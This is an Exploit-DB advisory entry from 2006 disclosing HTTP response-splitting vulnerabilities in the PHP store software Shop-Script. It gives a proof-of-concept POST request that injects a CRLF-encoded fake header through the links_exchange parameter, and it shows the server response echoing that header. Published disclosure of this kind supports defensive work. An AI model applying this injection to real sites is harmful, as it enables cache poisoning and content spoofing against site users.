Shop-Script - Multiple HTTP Response Splitting Vulnerabilities

EDB-ID:

28845




Platform:

PHP

Date:

2006-10-23


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/20685/info

Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. 

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

[Request Header] 

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header 
HTTP/1.0 
Accept: */* 
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET 
CLR 1.1.4322) 
Host: www.example.comhttp://www.shop-script-demo.com/
Content-Length: 18 
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa 
Connection: Close 
Pragma: no-cache 

current_currency=1 


[Response Header] 

HTTP/1.1 302 Found 
Date: Mon, 16 Oct 2006 17:39:57 GMT 
Server: Apache 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0 
Pragma: no-cache 
Location: index.php?links_exchange= 
FakeHeader:Fake_Custom_Header <= [Custome response 
injected by the attacker] 
Content-Length: 0 
Connection: close 
Content-Type: text/html